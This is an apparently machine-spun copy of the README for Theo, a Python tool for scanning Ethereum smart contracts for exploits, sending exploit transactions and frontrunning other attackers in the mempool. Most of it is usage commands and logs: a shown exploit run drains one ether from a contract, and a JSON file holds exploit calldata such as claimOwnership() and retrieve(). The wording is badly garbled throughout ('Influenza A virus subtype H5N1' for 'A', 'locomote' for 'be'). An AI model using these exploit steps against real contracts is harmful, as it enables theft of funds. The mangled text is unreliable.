Theo - Ethereum Recon Together With Exploitation Tool
Theo aims to locomote an exploitation framework in addition to a blockchain recon in addition to interaction tool.
Features:
- Automatic smart contract scanning which generates a listing of possible exploits.
- Sending transactions to exploit a smart contract.
- Transaction puddle monitor.
- Web3 console
- Frontrunning in addition to backrunning transactions.
- Waiting for a listing of transactions in addition to sending out others.
- Estimating gas for transactions way exclusively successful transactions are sent.
- Disabling gas estimation volition post transactions amongst a fixed gas quantity.
Theo's role is to struggle script kiddies that drive to locomote leet hackers. He tin brain to them trying to exploit his honeypots in addition to brand them lose their funds, for his ain gain.
"You didn't convey me along for my charming personality."
Install
Theo is available equally a PyPI package:
$ pip install theo $ theo --help usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC] [--account-pk ACCOUNT_PK] [--contract ADDRESS] [--skip-mythril SKIP_MYTHRIL] [--load-file LOAD_FILE] [--version] Monitor contracts for residuum changes or tx pool. optional arguments: -h, --help present this assistance message in addition to larn out --rpc-http RPC_HTTP Connect to this HTTP RPC (default: http://127.0.0.1:8545) --account-pk ACCOUNT_PK The account's individual substitution (default: None) --contract ADDRESS Contract to monitor (default: None) --skip-mythril SKIP_MYTHRIL Don't drive to discovery exploits amongst Mythril (default: False) --load-file LOAD_FILE Load exploit from file (default: ) --version present program's version numb er in addition to larn out RPC connections: --rpc-ws RPC_WS Connect to this WebSockets RPC (default: None) --rpc-ipc RPC_IPC Connect to this IPC RPC (default: None)$ git clone https://github.com/cleanunicorn/theo $ cd theo $ virtualenv ./venv $ . ./venv/bin/activate $ pip install -r requirements.txt $ pip install -e . $ theo --help- Python 3.5 or higher.
- An Ethereum node amongst RPC available. Ganache industrial plant actually good for testing or for validating exploits.
Demos
Find exploit in addition to execute it
Scan a smart contract, discovery exploits, exploit it:
- Start Ganache equally our local Ethereum node
- Deploy the vulnerable contract (happens inwards a unlike window)
- Scan for exploits
- Run exploit
Frontrun victim
Setup a honeypot, deploy honeypot, hold off for attacker, frontrun:
- Start geth equally our local Ethereum node
- Start mining
- Deploy the honeypot
- Start Theo in addition to scan the mem puddle for transactions
- Frontrun the assaulter in addition to bag his ether
Usage
Help screen
It's a proficient sentiment to banking venture tally the assistance concealment first.
$ theo --help usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC] [--account-pk ACCOUNT_PK] [--contract ADDRESS] [--skip-mythril] [--load-file LOAD_FILE] [--version] Monitor contracts for residuum changes or tx pool. optional arguments: -h, --help present this assistance message in addition to larn out --rpc-http RPC_HTTP Connect to this HTTP RPC (default: http://127.0.0.1:8545) --account-pk ACCOUNT_PK The account's individual substitution (default: None) --contract ADDRESS Contract to interact amongst (default: None) --skip-mythril Skip scanning the contract amongst Mythril (default: False) --load-file LOAD_FILE Load exploit from file (default: ) --version present program's version set out in addition to larn out RPC connections: --rpc-ws RPC_WS Connect to this WebSockets RPC (default: None) --rpc-ipc RPC_IPC Connect to this IPC RPC (default: None)Symbolic execution
Influenza A virus subtype H5N1 listing of exploits is automatically identified using mythril.
Start a session past times running:
$ theo --contract= --account-pk= Scanning for exploits inwards contract: 0xa586074fa4fe3e546a132a16238abe37951d41fe Connecting to HTTP: http://127.0.0.1:8545. Found exploits(s): [Exploit: (txs=[Transaction {Data: 0xcf7a8965, Value: 1000000000000000000}])] Influenza A virus subtype H5N1 few objects are available inwards the console: - `exploits` is an array of loaded exploits constitute past times Mythril or read from a file - `w3` an initialized illustration of web3py for the provided HTTP RPC endpoint Check the readme for to a greater extent than info: https://github.com/cleanunicorn/theo >>> You tin run into the available exploits found. In this illustration i exploit was found. Each exploit is an Exploit object.
>>> exploits[0] Exploit: (txs=[Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}])Running exploits
The exploit steps tin locomote run past times calling
.execute() on the exploit object. The transactions volition locomote signed in addition to sent to the node you're connected to.>>> exploits[0].execute() 2019-07-22 11:26:12,196 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': 1, 'gas': 30521, 'value': 1000000000000000000, 'data': '0xcf7a8965', 'nonce': 47} 2019-07-22 11:26:12,200 - Waiting for 0x41b489c78f654cab0b0451fc573010ddb20ee6437cdbf5098b6b03ee1936c33c to locomote mined... 2019-07-22 11:26:16,337 - Mined 2019-07-22 11:26:16,341 - Initial balance: 1155999450759997797167 (1156.00 ether) 2019-07-22 11:26:16,342 - Final balance: 1156999450759997768901 (1157.00 ether) Frontrunning
You tin start the frontrunning monitor to brain for other hackers trying to exploit the honeypot.
Use
.frontrun() to start listening for the exploit in addition to when found, post a transaction amongst a higher gas price.>>> exploits[0].frontrun() 2019-07-22 11:22:26,285 - Scanning the mem puddle for transactions... 2019-07-22 11:22:45,369 - Found tx: 0xf6041abe6e547cea93e80a451fdf53e6bdae67820244246fde44098f91ce1c20 2019-07-22 11:22:45,375 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': '0x2', 'data': '0xcf7a8965', 'gas': 30522, 'value': 1000000000000000000, 'nonce': 45} 2019-07-22 11:22:45,380 - Waiting for 0xa73316daf806e7eef83d09e467c32ce5faa239c6eda3a270a8ce7a7aae48fb7e to locomote mined... 2019-07-22 11:22:56,852 - Mined "Oh, my God! The quarterback is toast!"This industrial plant really good for about particularly crafted contracts or another vulnerable contracts, equally long equally y'all brand certain frontrunning is inwards your favor.
Load transactions from file
Instead of identifying the exploits amongst mythril, y'all tin specify the listing of exploits yourself.
Create a file that looks similar this exploits.json:
[ [ { "name": "claimOwnership()", "input": "0x4e71e0c8", "value": "0xde0b6b3a7640000" }, { "name": "retrieve()", "input": "0x2e64cec1", "value": "0x0" } ], [ { "name": "claimOwnership()", "input": "0x4e71e0c8", "value": "0xde0b6b3a7640000" } ] ]You tin charge it with:
$ theo --load-file=./exploits.jsonTroubleshooting
openssl/aes.h: No such file or directory
If y'all larn this error, y'all remove the libssl source libraries:
scrypt-1.2.1/libcperciva/crypto/crypto_aes.c:6:10: fatal error: openssl/aes.h: No such file or directory #include ^ compilation terminated. error: ascendency 'x86_64-linux-gnu-gcc' failed amongst larn out condition 1 ---------------------------------------- Command "/usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-build-5rl4ep94/scrypt/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-mnbzx9qe-record/install-record.txt --single-version-externally-managed --compile" failed amongst mistake code 1 inwards /tmp/pip-build-5rl4ep94/scrypt/ $ sudo apt install libssl-dev